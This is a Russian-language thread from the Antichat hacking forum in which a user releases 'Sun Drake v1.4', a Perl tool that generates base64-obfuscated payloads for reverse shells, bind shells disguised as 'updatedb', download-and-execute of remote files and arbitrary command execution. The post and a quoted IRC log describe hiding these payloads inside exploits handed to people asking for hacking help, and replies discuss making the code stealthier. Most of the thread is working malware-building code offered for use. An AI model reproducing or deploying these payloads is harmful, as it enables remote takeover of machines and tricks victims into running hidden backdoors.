ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Новая модификация, старого релиза...
  #1  
Старый 15.04.2007, 17:16
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию Новая модификация, старого релиза...

Sun Drake v 1.4

В первую очередь:
__________________________________________________ __________
Огромное СПАСИБО ВСЕМ кто так или иначе помогал.. при написании скрипта..
Отдельное спасибо:
Genom-- , KSURi, Helios.
А так же всем кто тестил скрипт ...

__________________________________________________ __________

Наконец-то переделал, изменил , добавил , исправил скрипт...

Теперь.. к Reverse-Shell (Back-connect) добавилось два модуля...
Всеми любимый Download and Exec и Bind Port .. )

1. Выбераем модуль...
Код:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Back-connect:
USAGE:
Parameters: file.pl ID-1 IP PORT save_as
Example: file.pl 1 127.0.0.1 9999 exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Download And Exec:
USAGE:
Parameters: file.pl ID-2 URL save_as
Example: file.pl 2 http://localhost/pinch.exe exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bind Port:
USAGE:
Parameters: file.pl ID-3 PORT save_as
Example: file.pl 3 9999 exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ID 1 - Back-connect:
ID 2 - Download And Exec:
ID 3 - Bind Port:


Скрипт в деле...

Сегодня утром зайдя на #antichat
Мне улыбнулась фартуна ))
Сразу после захода я увидел...

Цитата:
* Set by madnet on Tue Apr 10 15:53:33

<BA***> HELP ME EXPLOIT VBULETIN 3.6.5 =(
<slider|p3rl> О )
<[Paran0ik]> уруру фсем
<slider|p3rl> Вот и тестер мого релиза..
<slider|p3rl> ку
<slider|p3rl> )
<slider|p3rl> BA*** какой сплоент?
<BA***> slider|p3rl http://securitydot.net/xpl/exploits/vulnerabilities/articles/1748/ex
ploit.html
<slider|p3rl> А... тьфу ты... он кривой тут
<BA***> slider|p3rl а где не кривой взять
<slider|p3rl> У меня исправленный гдет валяется..
<BA***> его только вчера запостили!
<Fen-Omen> slider|p3rl: Защита от дурака?
<slider|p3rl> цыц (=
<BA***> slider|p3rl как он мождет у тебя валяться если только вчера запостили
<BA***> =)
<slider|p3rl> BA*** он в привате был =\
<Fen-Omen> Был
<BA***> slider|p3rl понятно дай пожулуйста!
<slider|p3rl> сча поищу =\
<slider|p3rl> Бля.. того нету.. есть другой немног =\
<slider|p3rl> но всё равноврлодь работает
<BA***> slider|p3rl выложи куданить!
<slider|p3rl> сек
<slider|p3rl> http://**.**4.174.94/exploit.txt
<BA***> slider|p3rl $payload= это что?
<slider|p3rl> переменная..
<slider|p3rl> payload
<slider|p3rl> Нус?
<BA***> slider|p3rl щас проверю!
<BA***> slider|p3rl калькулятор вылазит какойто =))
<slider|p3rl> гг... я проверял свой сплоент ))
<slider|p3rl> работает всё таки )
<Fen-Omen> ппц)
Используем Reverse Shell: (ID - 1)

Используя NetCat
открываем у себя порт например 9999
nc.exe -lvvp 9999


Запускаем скрипт.. и следуем USAGE:

Код:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Back-connect:
USAGE:
Parameters: file.pl ID-1 IP PORT save_as
Example: file.pl 1 127.0.0.1 9999 exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Передаём все параметры через коммандую строку нашему файлу...
Указываем ID (1), свой IP адресс и порт.. далее файл в котором сохранится наш скрипт..


Используем Download And Exec: (ID - 2)

Запускаем скрипт.. и следуем USAGE:

Код:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Download And Exec:
USAGE:
Parameters: file.pl ID-2 URL save_as
Example: file.pl 2 http://localhost/pinch.exe exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Передаём все параметры через коммандую строку нашему файлу...
Указываем ID (2) , полный путь к файлу который скачается и запуститься, ну и файл в котором сохранится наш
скрипт..

Используем Bind Port: (ID - 3)

Запускаем скрипт.. и следуем USAGE:
Код:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bind Port:
USAGE:
Parameters: file.pl ID-3 PORT save_as
Example: file.pl 3 9999 exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Всего три параметра...
1. ID ставим 3
2. какой порт будет пробинден.
3. Куда сохраниться скрипт.. )

Далее втыкаем куданить пооудобней сгенерированный скриптег.. в рабочий сплойт..
И даём... нашему скрипт киддису, или человеку который упорно просит похекать какойнить форум, чат etc..


Бак конект получился очень тяжелым как и бинд порт...
Нужно было чтоб соединение держалось и после закрытия консоли cmd.exe
Вот и размер немног подкачал
После долгой ночи кодинга.. кой что исправил... перепичал немног третий модуль...
(чтоб конект держался)...

Вообщем... Смотрим.. , Используем , Критикуем, Хвалим...
Короче .. Отписываемся.. )


Код:
#!/usr/bin/perl 

## Sun Drake v1.4
## Coded by slider

## Backdoor Reverse-Shell v1.3.multiplatform 
## Multiplatform path by helios

## Download And Exec
## Coded by Genom--

## http://antichat.ru  

if (@ARGV==0) 
{
print '~' x 57 . "\n";
print "Back-connect:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-1 IP PORT save_as\n";
print "Example: file.pl 1 127.0.0.1 9999 exploit.txt\n";
print '~' x 57 . "\n\n";
print '~' x 57 . "\n";
print "Download And Exec:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-2 URL save_as\n";
print "Example: file.pl 2 http://localhost/pinch.exe exploit.txt\n";
print '~' x 57 . "\n\n";
print '~' x 57 . "\n";
print "Bind Port:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-3 PORT save_as\n";
print "Example: file.pl 3 9999 exploit.txt\n";
print '~' x 57 . "\n\n";
}

if ($ARGV[0]==1) 
{ 
if (@ARGV!=4) 
{
print '~' x 57 . "\n";
print "Back-connect:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-1 IP PORT save_as\n";
print "Example: file.pl 1 127.0.0.1 9999 exploit.txt\n";
print '~' x 57 . "\n\n";
die "[-] FAILED\n";
}

my ($ID, $IP, $PORT, $NAME)=@ARGV;

$text = qq{
open logg, '>expl~1.tmp';
print logg 'use Socket; use FileHandle;';
print logg "socket(SOCKET,PF_INET,SOCK_STREAM, getprotobyname('tcp'));";
print logg "connect(SOCKET, sockaddr_in('$PORT',inet_aton('$IP')));";
print logg 'SOCKET->autoflush();';
print logg "open(STDIN,'>&SOCKET');";
print logg "open(STDOUT,'>&SOCKET');";  
print logg "open(STDERR,'>&SOCKET');";
if(-f '/bin/sh' && -x '/bin/sh') {print logg \"exec('/bin/sh');\";}
else{print logg \"exec('cmd.exe');\";}
close logg;
};

use MIME::Base64;  
$encoded = encode_base64($text);  
print "[*] Injecting...\n";  

open base64,">$NAME";  
print base64 "\$payload='$encoded';";  
print base64 "use MIME::Base64;";  
print base64 "\$decoded = decode_base64(\$payload);";  
print base64 "eval(\$decoded);";
print base64 "if (-f '/bin/sh' && -x '/bin/sh') {";
print base64 "system('perl expl~1.tmp &');";  
print base64 "system('rm -rf expl~1.tmp');}";
print base64 "else {";
print base64 "system('start perl expl~1.tmp');";  
print base64 "system('attrib +h expl~1.tmp');}";
close base64;  
print "[*] OK...\n\n";  

print "$encoded"; 
}

if (@ARGV[0]==2)
{
if (@ARGV!=3) 
{
print '~' x 57 . "\n";
print "Download And Exec:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-2 URL save_as\n";
print "Example: file.pl 2 http://localhost/pinch.exe exploit.txt\n";
print '~' x 57 . "\n\n";
die "[-] FAILED\n";
}

my ($ID, $file, $NAME)=@ARGV;

$TEXT = qq{
use LWP::UserAgent;
my \$get = LWP::UserAgent->new();
\$req=HTTP::Request->new(GET=>'$file');
\$response=\$get->request(\$req);
(\$name='$file')=~s(^.*/)();
open(DUMP,'>'.\$name);
binmode DUMP;
\$an=\$response->as_string;
chomp(\$an);
\$an=~m/\\n\\n(.*)/s;
print DUMP \$1;
close(DUMP);
system('attrib +h '.\$name);
exec('start '.\$name);};

use MIME::Base64; 
$encoded = encode_base64($TEXT); 
print "[*] Injecting...\n"; 
open base64,">$NAME"; 
print base64 "\$payload='$encoded';"; 
print base64 "use MIME::Base64;"; 
print base64 "\$decoded = decode_base64(\$payload);"; 
print base64 "eval(\$decoded);"; 
close base64; 
print "[*] Success..\n\n"; 
print "$encoded";  
}

if (@ARGV[0]==3)
{
if (@ARGV!=3) 
{
print '~' x 57 . "\n";
print "Bind Port:\n";
print "USAGE: \n";
print "Parameters: file.pl ID-3 BIND_PORT save_as\n";
print "Example: file.pl 3 9999 exploit.txt\n";
print '~' x 57 . "\n\n";
die "[-] FAILED\n";
}

my ($ID, $pt, $NAME)=@ARGV;
$port = $pt;

$TEXT = qq{

open logg, ">exp~2.tmp";
print logg 'exit if fork;';
print logg '\$0 = "updatedb" . " " x100;';
print logg '\$SIG{CHLD} = "IGNORE";';
print logg "use Socket;";
print logg "socket(S, PF_INET, SOCK_STREAM, 0);";
print logg "setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);";
print logg 'bind(S, sockaddr_in($port, INADDR_ANY));';
print logg "listen(S, 50);";
print logg "while(1){";
print logg "accept(X, S);";
print logg "unless(fork)";
print logg "{ open STDIN, '<&X';";
print logg "open STDOUT, '>&X';";
print logg "open STDERR, '>&X';";
print logg "close X;";
print logg "exec('cmd.exe');";
print logg "} close X;}";
};

use MIME::Base64;  
$encoded = encode_base64($TEXT);  
print "[*] Injecting...\n";  

open base64,">$NAME";  
print base64 "\$payload='$encoded';";  
print base64 "use MIME::Base64;";  
print base64 "\$decoded = decode_base64(\$payload);";  
print base64 "eval(\$decoded);";
print base64 "if (-f '/bin/sh' && -x '/bin/sh') {";
print base64 "system('perl exp~2.tmp &');";  
print base64 "system('rm -rf exp~2.tmp');}";
print base64 "else {";
print base64 "system('start perl exp~2.tmp');";  
print base64 "system('attrib +h exp~2.tmp');}";
close base64;  
print "[*] OK...\n\n";
print "$encoded";  
}
--------------------------ОТДЕЛЬНЫЕ МОДУЛИ--------------------------
Вот новый модуль Exec:
Очень простой.. поэтому прикручивать не стал..
авось пригодиться...

Код:
#!/usr/bin/perl 

## Module: Exec (Sun Drake v1.4)
## Coded by slider

if (@ARGV!=2) 
{
print '~' x 57 . "\n";
print "Exec Only:\n";
print "USAGE: \n";
print "Parameters: file.pl <command> save_as\n";
print "Example: file.pl \"shutdown -s -t -1\" exploit.txt\n";
print '~' x 57 . "\n\n";
die "[-] FAILED\n";
}

my ($pt, $NAME)=@ARGV;
$port = $pt;

$TEXT = qq{system('$pt');};

use MIME::Base64;  
$encoded = encode_base64($TEXT);  
print "[*] Injecting...\n";  

open base64,">$NAME";  
print base64 "\$payload='$encoded';";  
print base64 "use MIME::Base64;";  
print base64 "\$decoded = decode_base64(\$payload);";  
print base64 "eval(\$decoded);";
print "[*] OK...\n\n";
print "$encoded";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~
Exec Only:
USAGE:
Parameters: file.pl <command> save_as
Example: file.pl "shutdown -s -t -1" exploit.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

1. вводим команду которая выполнится...
2. Файл куда сохранить скрипт ..

Очень маленький и очень простой =)
--------------------------ОТДЕЛЬНЫЕ МОДУЛИ--------------------------
Переделал Download And Execute:
Код стал намного короче.... (а значит меньше палева...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~
Exec Only:
USAGE:
Parameters: file.pl <from> <in> save_as
Example: file.pl http://127.0.0.1/1.exe c:\\1.exe ext.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

Цитата:
#!/usr/bin/perl

## Module: New .. Dowload and Exec (Sun Drake v1.4)
## Coded by slider

if (@ARGV!=3)
{
print '~' x 57 . "\n";
print "Exec Only:\n";
print "USAGE: \n";
print "Parameters: file.pl <from> <in> save_as\n";
print "Example: file.pl http://127.0.0.1/1.exe c:\\\\1.exe ext.txt\n";
print '~' x 57 . "\n\n";
die "[-] FAILED\n";
}

my ($pt, $in, $NAME)=@ARGV;

$TEXT = qq{use LWP::UserAgent;
\$ua = LWP::UserAgent->new;
my \$req = HTTP::Request->new(GET =>"$pt");
\$res = \$ua->request(\$req, "$in");
exec("start $in");};

use MIME::Base64;
$encoded = encode_base64($TEXT);
print "[*] Injecting...\n";

open base64,">$NAME";
print base64 "\$payload='$encoded';";
print base64 "use MIME::Base64;";
print base64 "eval(decode_base64(\$payload));";
print "[*] OK...\n\n";
print "$encoded";

Последний раз редактировалось slider; 20.05.2007 в 21:42..
 
Ответить с цитированием

  #2  
Старый 16.04.2007, 05:02
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Тест на SunOS не прошёл=\


...или сервер такой уродский..
__________________

Последний раз редактировалось +toxa+; 16.04.2007 в 05:37..
 
Ответить с цитированием

  #3  
Старый 16.04.2007, 05:17
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

В принципе всё расчитано.... да и тестилось на винде...

Только Reverse Shell

Цитата:
From:Helios
ЗЫ:
Проверял в винде и во Frenzy
В никсах не забыть поменять конец строки на Unix-Like \n
Каменты по поводу патча
 
Ответить с цитированием

  #4  
Старый 16.04.2007, 09:20
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

гыг хекни недохекерра вот наш дивиз =) -- потом сплойты страшно качать =)
 
Ответить с цитированием

  #5  
Старый 16.04.2007, 15:22
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Добавил модуль exec:
 
Ответить с цитированием

  #6  
Старый 16.04.2007, 22:27
Аватар для Helios
Helios
Постоянный
Регистрация: 14.01.2007
Сообщений: 459
Провел на форуме:
1469995

Репутация: 589
Отправить сообщение для Helios с помощью ICQ
По умолчанию

За идею + однозначно)

А насчет СанОСи - на неделе поставлю, потестю. Если не баги отдельной машины - пофиксим=)
 
Ответить с цитированием

  #7  
Старый 09.05.2007, 10:09
Аватар для Ali_MiX
Ali_MiX
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732

Репутация: 80
Отправить сообщение для Ali_MiX с помощью ICQ Отправить сообщение для Ali_MiX с помощью Yahoo
По умолчанию

а Видео будет?
 
Ответить с цитированием

  #8  
Старый 09.05.2007, 10:58
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Переделал Download And Execute:
Код стал намного короче.... (а значит меньше палева...)
(Идёт как отдельный модуль)

Ali_MiX
Невижу смысла... ))
Просто сгенерировать скрипт и комуто его впарить? ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая статья по ActiveX Algol Чаты 18 11.01.2004 15:43
Новая статья по взлому sql Algol Чаты 2 17.01.2003 18:24
Новая цель Чаты 2 05.01.2003 14:49
Новая версия inetcrack 1.3 Algol Чаты 10 21.12.2002 18:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ